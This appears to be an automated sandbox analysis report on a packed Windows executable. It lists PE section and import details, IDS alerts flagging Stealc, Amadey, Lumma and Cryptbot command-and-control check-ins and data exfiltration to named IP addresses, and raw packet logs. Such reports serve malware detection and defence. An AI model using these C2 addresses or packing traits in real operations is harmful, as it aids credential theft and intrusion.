                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [esi], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      pop es
                                                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                                                                                                                                                                      • [ASM] VS2010 build 30319
                                                                                                                                                                                                                                                                                      • [ C ] VS2010 build 30319
                                                                                                                                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                      • [LNK] VS2010 build 30319

                                                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                      0x10000x2490000x16200317dcfaf83e955eb26b2d0b60dafe18eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .rsrc0x24a0000x1ac0x200da93a46a3e32f93e352d575037566e64False0.576171875data4.529214932758727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      0x24c0000x2a40000x2003788a5e953ab4eb4f21f82c80d9b24c3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      riuyamyn0x4f00000x19f0000x19f00038d4743d1e679204f5d47e9d89b38a0bFalse0.9950577701430723data7.954113428068828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      ezwcdmtt0x68f0000x10000x600d5d551fa17c4e942ff436e317cfd5dbeFalse0.5553385416666666data4.868935138394029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                      .taggant0x6900000x30000x2200e000bacf58ca9af8ae7083999857969fFalse0.06043198529411765DOS executable (COM)0.7654049850523982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                      RT_MANIFEST0x68eeac0x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                      kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:18.975704+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649742185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:19.195496+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.649742185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:19.202717+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.649742TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:19.419719+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.649742185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:19.436766+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.649742TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:20.409290+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.649742185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:20.654869+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649742185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:40.470065+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649910185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:41.656643+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649910185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:42.330939+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649910185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:42.938304+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649910185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:44.690317+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649910185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:45.139081+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649910185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:54:49.490507+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.650048185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:03.007560+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.650108185.215.113.4380TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:06.050003+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.65011031.41.244.1180TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:11.683546+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.650109TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:12.398878+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.650112185.215.113.4380TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:13.170019+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650113185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:17.728133+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650116188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:17.846326+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.650115185.215.113.4380TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:18.412462+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.650116188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:18.412462+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650116188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:18.584883+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650117185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:19.032182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650118188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:19.458399+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.650118188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:19.458399+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650118188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:20.930211+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650120188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:23.269436+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.650121185.215.113.4380TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:23.542467+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650122188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:24.057373+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650123185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:24.198084+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.650122188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:25.131468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650125188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:25.351916+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.650124185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:26.847570+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650126188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:28.100943+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.650127185.215.113.4380TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:28.826550+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.650131185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:29.180902+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.65013234.116.198.13080TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:30.089762+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650133188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:30.148618+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.650133188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:31.239682+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.65013434.116.198.13080TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:33.359020+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650137188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:34.192439+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.650138185.215.113.4380TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:34.305057+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.650137188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:34.305057+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650137188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:35.102609+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650141188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:35.277689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650142188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:35.516011+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.650141188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:35.516011+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650141188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:35.701448+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650142188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:36.848000+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.650150185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:38.176683+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650153188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:40.182147+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.65015534.116.198.13080TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:42.002164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650159188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:48.080325+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650167188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:49.772105+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.650169185.215.113.20680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:51.975773+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650171188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:59.298849+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650176188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:55:59.304071+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.650176188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:56:01.810798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650178188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:56:02.262951+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.650178188.114.96.3443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:56:03.017499+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.650179185.215.113.1680TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:56:54.421612+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65241420.42.65.92443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T10:59:07.611967+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65249652.182.143.214443TCP
                                                                                                                                                                                                                                                                                      2024-11-20T11:00:17.313489+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.652538185.215.113.4380TCP

                                                                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.092529058 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.092577934 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.092664003 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.093255997 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.093272924 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.908950090 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.909080029 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.913619995 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.913633108 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.914134026 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.915945053 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.916027069 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.916032076 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.916161060 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:09.963332891 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.088084936 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.088176012 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.088263035 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.088397980 CET49709443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.088418007 CET4434970940.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.660161018 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.660161018 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:10.972697973 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.074398041 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.074441910 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.075126886 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.075640917 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.075659037 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.740129948 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.740295887 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.742733955 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.742743015 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.742985010 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.785279036 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.862747908 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:12.903335094 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034307957 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034329891 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034343004 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034357071 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034388065 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034398079 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034419060 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034463882 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.034528017 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.052836895 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.052884102 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.052917957 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.052925110 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.053097963 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.130655050 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.130675077 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.130793095 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.130816936 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.130887032 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.140386105 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.140403986 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.140517950 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.140527010 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.140603065 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.142416954 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.142432928 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.142535925 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.142544031 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.142575026 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.142615080 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.144244909 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.144259930 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.144316912 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.144321918 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.144386053 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.144387007 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.215826035 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.215872049 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.215924978 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.215936899 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.216000080 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.216036081 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.224796057 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.224841118 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.224914074 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.224920988 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.224986076 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.224986076 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.226444960 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.226521969 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.226532936 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.226552010 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.226583004 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.226612091 CET49710443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.227494001 CET4434971013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:13.227508068 CET4434971013.107.246.45192.168.2.6
